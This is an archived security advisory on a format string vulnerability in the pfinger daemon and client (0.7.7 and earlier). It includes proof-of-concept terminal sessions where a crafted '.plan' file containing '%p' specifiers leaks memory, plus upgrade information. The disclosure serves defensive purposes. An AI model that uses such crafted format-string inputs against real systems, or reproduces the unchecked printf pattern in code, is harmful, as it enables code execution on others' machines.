TUCoPS :: Unix :: General :: sb4952.htm

pfinger format string vulnerability
26th Sep 2002 [SBWID-4952]
COMMAND

	pfinger format string vulnerability

SYSTEMS AFFECTED

	pfinger <= 0.7.7

PROBLEM

	A format string vulnerability in pfinger,  a  finger  daemon,  has  been
	discovered and published in INTEXXIA SECURITY ADVISORY ID  #1050-181201,
	by Guillaume Pelat.
	
	Both client and server  are  vulnerable  to  a  format  string  injection
	using for example a '.plan' file.
	
	Client side : the client uses directly the data received from  the  server
	as the first argument of the printf(3) function. A user could  create  a
	specially crafted '.plan' file that would be printed by the  pfinger  client.
	As a result, it could be possible  to  make  execute  arbitrary  code  by
	the client.
	
	Server side : if the server is configured to connect to a master  server
	(with the <sitehost> directive), data received from the  master  server
	are directly used as first argument in  the  printf(3)  function.  If  a
	malicious user modifies the master to make it send crafted data,  it  is
	possible to make execute code to the vulnerable 'slave' server.
	
	If a user has an account on the master server, he can create  a  crafted
	'.plan' file containing the format  string.  A  simple  request  to  the
	'client' server would also exploit the server side vulnerability.
	
	The pfinger daemon is launched with  'nobody'  permissions  by  default.
	Complete exploitation of this  vulnerability  will  permit  an  attacker
	to execute code with the 'nobody' permissions. But this  flaw  could  be
	used to compromize the local system by exploiting other local  vulnerabilities.
	
	
	PROOF OF CONCEPT ================
	
	Here are two proofs of concept for the both sides.
	
	Client side :
	
	
	evil@test:~$ cat ~/.plan 
	Now a little format string: %p %p %p :-)
	evil@test:~$ 
	
	good@test:~$ finger -l evil
	Login Name: evil                In real life: Evil
	Login    Name                   Status  Login time Host
	evil     Evil                   active  Mon 08:02  test
	No mail.
	Plan:
	Now a little format string: 0x8049da0 0x640 0x400a252d :-)
	good@test:~$
	
	
	Server side :
	
	
	good@test:~$ cat /etc/fingerconf
	<fingerconf>
	<sitehost>master</sitehost>
	</fingerconf>
	
	evil@master:~$ cat ~/.plan
	Now a little format string: %p %p %p :-)
	evil@master:~$ telnet test 79
	Trying x.x.x.x...
	Connected to test.lab.intexxia.com.
	Escape character is '^]'.
	/W evil
	Login Name: evil                        In real life: Evil
	Login    Name                   Status  Login time Host
	evil     Evil                   active  Mon 08:02  master
	No mail.
	Plan:
	Now a little format string: 0xbfbff860 0x400 0x0 :-)
	Connection closed by foreign host.
	evil@master:~$
	
	

SOLUTION

	A new version has been released  which  corrects  this  security  issue.
	pfinger version 0.7.8 is available at :
	
	http://www.xelia.ch/unix/pfinger/
	
	
	 Update (02 January 2003)
	 ======
	
	Another format string overflow was found and corrected in version 0.7.9

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH